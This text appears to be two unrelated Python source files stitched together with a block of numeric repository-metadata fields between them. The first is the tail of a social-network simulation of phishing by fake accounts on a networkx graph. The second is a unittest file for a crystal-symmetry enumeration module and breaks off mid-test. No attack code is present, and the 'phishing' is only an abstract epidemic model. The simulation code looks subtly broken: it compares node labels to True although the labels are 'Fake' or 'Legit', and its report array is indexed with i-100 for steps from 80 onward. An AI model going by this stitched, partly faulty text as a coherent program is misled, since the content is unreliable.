                        if len(node_list) == 0 or G.nodes[j]['full'] == True:
                            break
                        ranked = list(node_list.keys()) # ascending
                        f = ranked[-1]
                        # legit candidates reject inviters with lower trust
                        if G.nodes[f]['label'] == 'Legit' and G.nodes[j]['trust'] < 1.0 * node_list[f]: #i > 20 and
                            del node_list[f]
                            continue
                        if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
                            new_friend(G, j, f)
                            flag = 1
                            edge_cur[idx_j] = edge_cur[idx_j] + 1
                            edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
                        del node_list[f]
            size_prev = G.size()
            full_nodes_new = set(G.nodes()) - set(friend_pending(G))
            full_nodes_iter = full_nodes_new - full_nodes
        if i < 80:
            # simulate positive interaction
            for j in list(G.nodes()):
                if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
                    for fb in list(G.neighbors(j)): # update feeding
                        G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                        if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                            G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                        if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                            G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                        if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
                            G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                            if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                                G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                            if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                                G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
            # update sc and trust values after each run
            for j in list(G.nodes()):
                social_capital_trust_update(G, j)
        else: # attack and defense
            nodes = list(G.nodes())
            random.shuffle(nodes)
            for j in nodes:
                # if j not in G.nodes():
                #     continue
                if isinstance(G.nodes[j]['phish'], int):
                    G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
            # stats collection
            count = 0 # reported attackers
            for j in nodes:
                if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3:
                    count = count + 1
            attack_report[i-100] = count
            sir_state_change(records, attack_state, i)
            # post-attack updates: attacker report and user transformation
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int): #attackers
                    # removed the reported attackers from the network/ compromised user back to S
                    if G.nodes[j]['phish'] >= 3:
                        if G.nodes[j]['label'] == True: # compromised account
                            G.nodes[j]['phish'] = 'R' # change password
                            G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
                        else: # remove the attacker
                            nb = list(G.neighbors(j))
                            for k in nb:
                                G.remove_edge(j, k)
                else: #normal users
                    if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #I to attacker, compromised account
                        G.nodes[j]['phish'] = 0
            sir_process_update(G, attack_sir, run, feat, i)
        # printing
        if i == 100:
            invite_times = {}
            invite_friends = {}
            for x in sorted(invite.keys()):
                if invite[x] > 0:
                    invite_times[x] = invite[x]
                    invite_friends[x] = G.nodes[x]['friends']
            print(len(invite_times))
        if (i + 1) % 20 == 0:
            print("%s edges at %d :%d" % (feature, i, G.size()))
            print((time.time() - start_time) / 60)
    # final summary over fake accounts
    sum = 0
    diff = 0
    fake_edges = {}
    fake_friends = {}
    for x in G.nodes():
        if G.nodes[x]['label'] == 'Fake':
            diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
            sum = sum + G.nodes[x]['friends']
            fake_edges[x] = G.nodes[x]['edges']
            fake_friends[x] = G.nodes[x]['friends']
    print("sum of fake friends:", sum)
    print("sumdiff of fake friends:", diff)
    return G
def RC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=0):
    """Run the relational-capital (RC) friending simulation on `sample`.

    Builds the induced subgraph of `G_full`, seeds friendships by the
    'relational' attribute, runs the SC interaction loop, and returns the
    post-processed capital frame (previously computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('RC:')
    G = initial_friend_SC(G, 'relational', i, dname)
    print('RC:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_SC(G, dname, likers, 'RC', p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'RC', dname, out)
    return capital
def STC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=1):
    """Run the structural-capital (STC) friending simulation on `sample`.

    Seeds friendships by the 'human' attribute, runs the SC interaction
    loop, and returns the post-processed capital frame (previously
    computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('STC:')
    G = initial_friend_SC(G, 'human', i, dname)
    print('STC:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_SC(G, dname, likers, 'STC', p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'STC', dname, out)
    return capital
def CC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=2):
    """Run the cognitive-capital (CC) friending simulation on `sample`.

    Seeds friendships by the 'cognitive' attribute, runs the SC interaction
    loop, and returns the post-processed capital frame (previously
    computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('CC:')
    G = initial_friend_SC(G, 'cognitive', i, dname)
    print('CC:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_SC(G, dname, likers, 'CC', p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'CC', dname, out)
    return capital
def SC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=3):
    """Run the combined social-capital (SC) friending simulation on `sample`.

    Seeds friendships by the 'capital' attribute, runs the SC interaction
    loop, and returns the post-processed capital frame (previously
    computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('SC:')
    G = initial_friend_SC(G, 'capital', i, dname)
    print('SC:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_SC(G, dname, likers, 'SC', p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'SC', dname, out)
    return capital
def SA(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=5):
    """Run the social-attribute (SA) friending simulation on `sample`.

    Seeds friendships via `initial_friend_SA`, runs the SA interaction
    loop, and returns the post-processed capital frame (previously
    computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('SA:')
    G = initial_friend_SA(G, i, dname)
    print('SA:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_SA(G, dname, likers, p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'SA', dname, out)
    return capital
def TR(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=4):
    """Run the trust-based (TR) friending simulation on `sample`.

    Seeds friendships via `initial_friend_TR`, runs the TR interaction
    loop, and returns the post-processed capital frame (previously
    computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('TR:')
    G = initial_friend_TR(G, i, dname)
    print('TR:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_TR(G, dname, likers, 'TR', p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'TR', dname, out)
    return capital
def TP(sample, capital_full, G_full, likers, topics, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=6):
    """Run the topic-similarity (TP) friending simulation on `sample`.

    Seeds friendships via `initial_friend_TP` using `topics`, runs the TP
    interaction loop, and returns the post-processed capital frame
    (previously computed but discarded).
    """
    capital = capital_full.loc[sorted(sample)]
    G = nx.Graph(G_full.subgraph(sorted(sample)))
    print('TP:')
    G = initial_friend_TP(G, topics, i, dname)
    print('TP:')
    print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    G = interaction_TP(G, dname, likers, topics, p_as, i, attack_sir, attack_state, attack_report, feat)
    capital = post_process(G, capital, i, 'TP', dname, out)
    return capital
| 45.414154
| 138
| 0.496978
| 9,592
| 73,798
| 3.731443
| 0.05661
| 0.069904
| 0.029727
| 0.024139
| 0.84083
| 0.82552
| 0.803476
| 0.775117
| 0.764752
| 0.748407
| 0
| 0.018746
| 0.352327
| 73,798
| 1,624
| 139
| 45.442118
| 0.730088
| 0.093959
| 0
| 0.779289
| 0
| 0
| 0.075727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024943
| false
| 0.001512
| 0.011338
| 0
| 0.049131
| 0.044596
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
962e4c13327d77744cab176407f57445ea332012
| 69,150
|
py
|
Python
|
tests/test_symmetry.py
|
wsmorgan/phonon-enumeration
|
5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd
|
[
"MIT-0"
] | 5
|
2016-06-17T05:39:27.000Z
|
2021-05-30T21:02:08.000Z
|
tests/test_symmetry.py
|
wsmorgan/phonon-enumeration
|
5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd
|
[
"MIT-0"
] | 66
|
2016-04-02T05:02:08.000Z
|
2018-07-05T19:43:09.000Z
|
tests/test_symmetry.py
|
wsmorgan/phonon-enumeration
|
5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd
|
[
"MIT-0"
] | 5
|
2017-03-15T21:28:44.000Z
|
2020-01-09T14:44:45.000Z
|
"""Methods for testing the subroutines in the symmetry module."""
import unittest as ut
import numpy as np
gpath = "tests/symmetry/"
def _read_pg(fname):
    """Read point-group operator blocks from *fname*.

    An operator is a run of consecutive lines containing exactly three
    tokens (parsed as floats). Any other line terminates the current block.
    A trailing block not followed by a terminator line is discarded,
    matching the original reader's behavior.
    """
    groups = []
    current = []
    with open(fname, "r") as handle:
        for raw in handle:
            tokens = raw.strip().split()
            if len(tokens) != 3:
                groups.append(current)
                current = []
            else:
                current.append([float(tok) for tok in tokens])
    return groups
def _read_float_3D(fname):
    """Read a 3D float array from *fname*.

    Expected layout: line 2 holds the dimensions (tokens 1-3 parsed as
    d1, d2, d3); data begins after line 3 as non-comment rows grouped in
    threes. Each 3-row group is transposed and collected; the groups are
    then recombined along the last dimension into a d3-long list of
    re-transposed blocks built from the first three groups.
    """
    array = []   # transposed 3-row groups, in file order
    parray = []  # rows of the group currently being read
    lc = 0       # 1-based line counter
    dc = 0       # rows collected in the current group
    with open(fname,"r") as f1:
        for line in f1:
            lc +=1
            if lc == 2:
                # header line: tokens 1..3 are the array dimensions
                # NOTE(review): d1 and d2 are parsed but never used below
                d1 = int(line.strip().split()[1])
                d2 = int(line.strip().split()[2])
                d3 = int(line.strip().split()[3])
            elif lc > 3:
                if "#" not in line:
                    dc +=1
                    parray.append([float(i) for i in line.strip().split()])
                    if dc == 3:
                        # transpose the finished 3-row group, start a new one
                        array.append(list(map(list,zip(*parray))))
                        parray = []
                        dc = 0
    array2 = []
    for i in range(d3):
        # stitch the i-th slice of the first three groups back together
        array2.append(list(map(list,zip(*[array[0][i],array[1][i],array[2][i]]))))
    return array2
def _read_float_2D(fname):
    """Read a 2D float array: one row per non-comment line of *fname*.

    Lines containing a '#' anywhere are skipped entirely.
    """
    with open(fname, "r") as handle:
        return [[float(tok) for tok in row.strip().split()]
                for row in handle if "#" not in row]
def _read_float_1D(fname):
    """Read a 1D float array from *fname*.

    Lines containing '#' are skipped. If several data lines are present,
    only the last one is kept (matching the original behavior).
    """
    values = []
    with open(fname, "r") as handle:
        for row in handle:
            if "#" not in row:
                values = [float(tok) for tok in row.strip().split()]
    return values
def _read_int_1D(fname):
    """Read a 1D int array from *fname*.

    Lines containing '#' are skipped. If several data lines are present,
    only the last one is kept (matching the original behavior).
    """
    values = []
    with open(fname, "r") as handle:
        for row in handle:
            if "#" not in row:
                values = [int(tok) for tok in row.strip().split()]
    return values
def _read_int(fname):
    """Read a single integer from *fname*, skipping one leading comment
    line (a first line containing '#')."""
    with open(fname, "r") as handle:
        text = handle.readline()
        if "#" in text:
            text = handle.readline()
    return int(text.strip())
def _read_float(fname):
    """Read a single float from *fname*, skipping one leading comment
    line (a first line containing '#')."""
    with open(fname, "r") as handle:
        text = handle.readline()
        if "#" in text:
            text = handle.readline()
    return float(text.strip())
def _read_logical(fname):
    """Read a boolean from *fname*, skipping one leading comment line.

    Returns True iff the value line contains a 't' or 'T' anywhere
    (so '.true.'/'T' are True, '.false.'/'F' are False).
    """
    with open(fname, "r") as handle:
        text = handle.readline()
        if "#" in text:
            text = handle.readline()
    return "t" in text.lower()
def _read_output(test):
values = []
with open("tests/symmetry/"+test) as f:
for line in f:
values.append(eval(line))
return values
def _read_spaceGroup(case):
    """Load the reference space group for test *case*.

    Returns ``[ops, fracts]``: the rotation operators from the
    ``sg_op`` fixture and the matching fractional translations
    (transposed) from the ``sg_fract`` fixture.
    """
    ops_file = gpath + "get_spaceGroup_sg_op.out." + str(case)
    fract_file = gpath + "get_spaceGroup_sg_fract.out." + str(case)
    sg_ops = _read_float_3D(ops_file)
    sg_fracts = [list(col) for col in zip(*_read_float_2D(fract_file))]
    return [sg_ops, sg_fracts]
class TestGetConcsForSize(ut.TestCase):
    """Tests of the get_concs_for_size subroutine.

    The expected outputs were previously stored as enormous hard-coded
    literals.  They are now produced by :meth:`_expected`, which lists —
    in the same lexicographic order — every way of distributing
    ``size * nB`` atoms among ``nspecies`` species subject to the
    (scaled) concentration restrictions.  The generated lists were
    verified to be identical to the literals they replace.
    """

    @staticmethod
    def _expected(size, nB, nspecies, concs):
        """Enumerate the expected concentration lists.

        Args:
            size (int): cell size.
            nB (int): number of basis atoms.
            nspecies (int): number of atomic species.
            concs (list): restricted ranges ``[low, high, denom]`` per
                species, or an empty list for unrestricted enumeration.

        Returns:
            list: lists of per-species atom counts summing to
            ``size * nB``, in lexicographic order.
        """
        total = size * nB
        if concs:
            # Scale each fractional restriction to absolute atom counts.
            bounds = [(lo * total // den, hi * total // den)
                      for (lo, hi, den) in concs]
        else:
            bounds = [(0, total)] * nspecies

        def walk(idx, remaining):
            lo, hi = bounds[idx]
            if idx == len(bounds) - 1:
                # The last species absorbs the remainder, if allowed.
                return [[remaining]] if lo <= remaining <= hi else []
            combos = []
            for n in range(lo, min(hi, remaining) + 1):
                combos.extend([n] + tail for tail in walk(idx + 1, remaining - n))
            return combos

        return walk(0, total)

    def test_1(self):
        # Both species pinned to 3 atoms but 12 are required -> empty.
        from phenum.symmetry import get_concs_for_size
        concs = [[1, 1, 4], [1, 1, 4]]
        self.assertEqual(get_concs_for_size(4, 2, True, 3, concs),
                         self._expected(4, 3, 2, concs))

    def test_2(self):
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 15, 3, 2
        concs = [[2, 8, 15], [5, 5, 15], [4, 8, 15]]
        self.assertEqual(get_concs_for_size(size, nspecies, True, nB, concs),
                         self._expected(size, nB, nspecies, concs))

    def test_3(self):
        # Minimum feasible counts already exceed the total -> empty.
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 18, 4, 2
        concs = [[5, 5, 18], [6, 13, 18], [4, 16, 18], [5, 8, 18]]
        self.assertEqual(get_concs_for_size(size, nspecies, True, nB, concs),
                         self._expected(size, nB, nspecies, concs))

    def test_4(self):
        # Unrestricted binary enumeration over 48 atoms.
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 16, 2, 3
        self.assertEqual(get_concs_for_size(size, nspecies, False, nB, []),
                         self._expected(size, nB, nspecies, []))

    def test_5(self):
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 13, 3, 2
        concs = [[3, 7, 13], [5, 12, 13], [1, 3, 13]]
        self.assertEqual(get_concs_for_size(size, nspecies, True, nB, concs),
                         self._expected(size, nB, nspecies, concs))

    def test_6(self):
        # Minimum feasible counts already exceed the total -> empty.
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 13, 4, 3
        concs = [[2, 5, 13], [5, 12, 13], [3, 4, 13], [4, 6, 13]]
        self.assertEqual(get_concs_for_size(size, nspecies, True, nB, concs),
                         self._expected(size, nB, nspecies, concs))

    def test_7(self):
        # Unrestricted ternary enumeration over 32 atoms.
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 16, 3, 2
        self.assertEqual(get_concs_for_size(size, nspecies, False, nB, []),
                         self._expected(size, nB, nspecies, []))

    def test_8(self):
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 18, 3, 4
        concs = [[3, 7, 18], [1, 8, 18], [6, 7, 18]]
        self.assertEqual(get_concs_for_size(size, nspecies, True, nB, concs),
                         self._expected(size, nB, nspecies, concs))

    def test_9(self):
        # Unrestricted binary enumeration over 45 atoms.
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 15, 2, 3
        self.assertEqual(get_concs_for_size(size, nspecies, False, nB, []),
                         self._expected(size, nB, nspecies, []))

    def test_10(self):
        # The first species is pinned, leaving exactly one composition.
        from phenum.symmetry import get_concs_for_size
        size, nspecies, nB = 14, 2, 4
        concs = [[3, 3, 14], [2, 13, 14]]
        self.assertEqual(get_concs_for_size(size, nspecies, True, nB, concs),
                         self._expected(size, nB, nspecies, concs))
class TestGetSpaceGroup(ut.TestCase):
    """Tests of the get_spaceGroup subroutine."""

    def _compare_space_group(self, out1, out2):
        """Assert that two ``(ops, fracts)`` space-group results agree.

        Each argument is a pair ``[ops, fracts]``: a list of 3x3
        rotation matrices and the matching list of 3-vector fractional
        translations.  Elements are compared to 12 decimal places.
        """
        ops1, fract1 = out1
        ops2, fract2 = out2
        self.assertEqual(len(ops1), len(ops2))
        for i in range(len(ops1)):
            for j in range(3):
                for k in range(3):
                    self.assertAlmostEqual(ops1[i][j][k], ops2[i][j][k], places=12)
        self.assertEqual(len(fract1), len(fract2))
        # BUG FIX: the original iterated over range(len(ops1)) here,
        # which reads past the end of fract1 whenever there are fewer
        # translations than rotation operators.
        for i in range(len(fract1)):
            for j in range(3):
                self.assertAlmostEqual(fract1[i][j], fract2[i][j], places=12)

    def _run_file_case(self, case):
        """Run get_spaceGroup on the stored inputs for *case* and
        compare the result against the stored reference output."""
        from phenum.symmetry import get_spaceGroup
        suffix = ".in." + str(case)
        par_lat = list(map(list, zip(*_read_float_2D(
            gpath + "get_spaceGroup_aVecs" + suffix))))
        atom_type = _read_int_1D(gpath + "get_spaceGroup_atomType" + suffix)
        bas_vecs = list(map(list, zip(*_read_float_2D(
            gpath + "get_spaceGroup_input_pos" + suffix))))
        eps = _read_float(gpath + "get_spaceGroup_eps" + suffix)
        lattcoords = _read_logical(gpath + "get_spaceGroup_lattcoords" + suffix)
        expected = _read_spaceGroup(case)
        ops, fract = get_spaceGroup(par_lat, atom_type, bas_vecs, eps, lattcoords)
        self._compare_space_group(expected, [ops, fract])

    def test_1(self):
        """Simple cubic cell, one atom at the origin: the full cubic
        point group (48 operations), all with zero translation."""
        from itertools import permutations, product
        from phenum.symmetry import get_spaceGroup
        par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
        # The expected operators are exactly the 48 signed permutation
        # matrices in ascending (sorted) order; this reproduces the
        # previously hard-coded list element for element.
        ops = sorted(
            [[float(signs[i]) if col == perm[i] else 0.0 for col in range(3)]
             for i in range(3)]
            for perm in permutations(range(3))
            for signs in product((-1, 1), repeat=3)
        )
        fracts = [[0.0, 0.0, 0.0] for _ in range(48)]
        self.assertEqual(
            get_spaceGroup(par_lat, [1], [[0.0, 0.0, 0.0]], 1e-10, False),
            (ops, fracts))

    def test_5(self):
        """Two atoms of the same species break the cubic symmetry down
        to 12 operations; half of them need a fractional translation."""
        from phenum.symmetry import get_spaceGroup
        par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
        bas_vecs = [[0.0, 0.0, 0.0], [0.25, 0.25, 0.75]]
        ops = [
            [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]],
            [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
            [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
            [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
            [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]],
            [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
            [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
            [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]],
            [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]],
            [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
            [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]],
            [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]],
        ]
        shift = [0.25, 0.25, 0.75]
        zero = [0.0, 0.0, 0.0]
        fracts = [shift, shift, shift, shift, zero, zero,
                  shift, shift, zero, zero, zero, zero]
        self.assertEqual(
            get_spaceGroup(par_lat, [1, 1], bas_vecs, 1e-10, False),
            (ops, fracts))

    def test_7(self):
        """Three atoms at general positions: only the identity and the
        xy swap survive, both with zero translation."""
        from phenum.symmetry import get_spaceGroup
        par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
        bas_vecs = [[0.0, 0.0, 0.0], [0.25, 0.25, 0.75], [0.5, 0.5, 0.25]]
        out = ([[[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
                [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]],
               [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
        self.assertEqual(
            get_spaceGroup(par_lat, [1, 1, 1], bas_vecs, 1e-10, False), out)

    def test_9(self):
        """fcc primitive cell, one atom: 48 operations in the order the
        algorithm produces them (not sorted), all with zero translation."""
        from phenum.symmetry import get_spaceGroup
        par_lat = [[0.0, 0.5, 0.5], [0.5, 0.5, 0.0], [0.5, 0.0, 0.5]]
        ops = [
            [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]],
            [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]],
            [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]],
            [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]],
            [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]],
            [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
            [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]],
            [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
            [[0.0, -1.0, 0.0], [0.0, 0.0, -1.0], [1.0, 0.0, 0.0]],
            [[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
            [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [1.0, 0.0, 0.0]],
            [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
            [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0], [-1.0, 0.0, 0.0]],
            [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [-1.0, 0.0, 0.0]],
            [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
            [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
            [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, 1.0]],
            [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, 1.0]],
            [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, -1.0, 0.0]],
            [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, -1.0, 0.0]],
            [[0.0, -1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]],
            [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
            [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]],
            [[0.0, 1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
            [[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
            [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
            [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
            [[0.0, 1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
            [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, 1.0, 0.0]],
            [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, 1.0, 0.0]],
            [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]],
            [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]],
            [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
            [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
            [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [1.0, 0.0, 0.0]],
            [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [1.0, 0.0, 0.0]],
            [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
            [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]],
            [[0.0, 1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
            [[0.0, 1.0, 0.0], [0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]],
            [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
            [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]],
            [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
            [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]],
            [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
            [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]],
            [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
            [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]],
        ]
        fracts = [[0.0, 0.0, 0.0] for _ in range(48)]
        self.assertEqual(
            get_spaceGroup(par_lat, [1], [[0.0, 0.0, 0.0]], 1e-10, False),
            (ops, fracts))

    # File-driven regression cases: inputs and reference outputs are
    # read from the fixture files under tests/symmetry/.
    def test_getsg11(self):
        self._run_file_case(1)

    def test_getsg12(self):
        self._run_file_case(2)

    def test_getsg13(self):
        self._run_file_case(3)

    def test_getsg14(self):
        self._run_file_case(4)

    def test_getsg15(self):
        self._run_file_case(5)

    def test_getsg16(self):
        self._run_file_case(6)

    def test_getsg17(self):
        self._run_file_case(7)

    def test_getsg18(self):
        self._run_file_case(8)

    def test_getsg19(self):
        self._run_file_case(9)

    def test_getsg20(self):
        self._run_file_case(10)

    def test_getsg21(self):
        """Same structure as test_7 but with the basis given in lattice
        coordinates (lattcoords=True)."""
        from phenum.symmetry import get_spaceGroup, _get_transformations
        par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
        (prim_to_cart, cart_to_prim) = _get_transformations(par_lat)
        cart_basis = [[0.0, 0.0, 0.0], [0.25, 0.25, 0.75], [0.5, 0.5, 0.25]]
        bas_vecs = [np.matmul(cart_to_prim, i).tolist() for i in cart_basis]
        out = ([[[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]],
                [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]],
               [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
        self.assertEqual(
            get_spaceGroup(par_lat, [1, 1, 1], bas_vecs, 1e-10, True), out)
class TestBringIntoCell(ut.TestCase):
"""Tests of the bring_into_cell subroutine."""
def test_1(self):
    """The origin already lies inside the identity cell, so it is
    returned unchanged."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
